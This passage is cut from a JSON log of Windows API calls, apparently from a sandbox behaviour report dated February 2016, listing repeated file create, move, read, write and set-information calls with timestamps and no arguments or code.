"api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,802", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,802", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,802", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,802", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,802", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,812", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,812", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,812", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,812", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,812", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,812", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,812", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,812", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,822", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,822", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,822", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,822", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,822", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,822", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,822", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,822", "api": 
"NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,832", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,832", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,832", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,832", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,832", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,832", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,832", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,832", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,832", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,842", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,842", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,842", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,842", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,842", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,842", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,842", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,842", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,842", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,842", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,852", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,852", "api": "NtWriteFile"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:41:41,852", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,852", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,852", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,852", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,852", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,852", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,852", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,852", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,852", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,862", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,862", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,862", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,862", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,862", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,862", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,862", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,862", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,862", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,862", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,862", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,872", "api": "NtReadFile"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:41:41,872", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,872", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,872", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,872", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,872", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,872", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,872", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,882", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,882", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,882", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,882", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,882", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,882", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,882", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,882", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,882", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,892", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,892", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,892", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,892", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,892", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", 
"timestamp": "2016-02-16 17:41:41,892", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,892", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,892", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,892", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,892", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,902", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,902", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,902", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,902", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,902", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,902", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,902", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,902", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,912", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,912", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,912", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,912", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,912", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,912", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,912", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,912", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:41:41,912", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,912", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,912", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,922", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,922", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,922", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,922", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,922", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,922", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,922", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,922", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,922", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,932", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,932", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,932", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,932", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,932", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,932", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,932", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,932", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,932", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,942", 
"api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,942", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,942", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,942", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,942", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,942", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,942", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,942", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,942", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,942", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,942", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,952", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,952", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,952", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,952", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,952", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,952", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,952", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,962", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,962", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,962", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,962", "api": 
"NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,962", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,962", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,962", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,962", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,962", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,962", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,962", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,972", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,972", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,972", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,972", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,972", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,972", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,972", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,972", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,972", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,972", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,983", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,983", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,983", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,983", "api": "NtWriteFile"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:41:41,983", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,983", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,983", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,983", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,983", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,993", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,993", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,993", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,993", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,993", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,993", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,993", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,993", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,993", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,993", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,993", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,003", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,003", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,003", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,003", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,003", "api": "MoveFileWithProgressW"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:41:42,003", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,003", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,003", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,003", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,003", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,013", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,013", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,013", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,013", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,013", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,013", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,013", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,013", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,013", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,013", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,023", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,023", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,023", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,023", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,023", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,023", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": 
"2016-02-16 17:41:42,033", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,033", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,033", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,033", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,033", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,033", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,033", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,033", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,033", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,033", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,043", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,043", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,043", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,043", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,043", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,043", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,043", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,043", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,043", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,053", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,053", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:41:42,053", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,053", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,053", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,053", "api": "NtFreeVirtualMemory"}, {"category": "device", "timestamp": "2016-02-16 17:41:42,053", "api": "DeviceIoControl"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,053", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,053", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,063", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,063", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,063", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,063", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,063", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,063", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,063", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,063", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,073", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,073", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,073", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,073", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,073", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,073", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,073", "api": 
"NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,073", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,083", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,083", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,083", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,083", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,083", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,083", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,083", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,083", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,083", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,083", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,083", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,083", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,093", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,093", "api": "NtFreeVirtualMemory"}, {"category": "device", "timestamp": "2016-02-16 17:41:42,093", "api": "DeviceIoControl"}, {"category": "device", "timestamp": "2016-02-16 17:41:42,093", "api": "DeviceIoControl"}, {"category": "device", "timestamp": "2016-02-16 17:41:42,093", "api": "DeviceIoControl"}, {"category": "device", "timestamp": "2016-02-16 17:41:42,093", "api": "DeviceIoControl"}, {"category": "device", "timestamp": "2016-02-16 17:41:42,093", "api": "DeviceIoControl"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,093", "api": "NtCreateFile"}, {"category": "filesystem", 
"timestamp": "2016-02-16 17:41:42,093", "api": "MoveFileWithProgressW"}, {"category": "device", "timestamp": "2016-02-16 17:41:42,093", "api": "DeviceIoControl"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,093", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,093", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,093", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,103", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,103", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,103", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,103", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,103", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,103", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,103", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,103", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,103", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,103", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,113", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,113", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,113", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,113", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,113", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,113", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:41:42,113", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,113", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,143", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,143", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,143", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,143", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,143", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,143", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,143", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,153", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,153", "api": "NtFreeVirtualMemory"}, {"category": "device", "timestamp": "2016-02-16 17:41:42,153", "api": "DeviceIoControl"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,153", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,153", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,153", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,153", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,153", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,153", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,153", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:42,153", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,163", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:42,163", "api": 
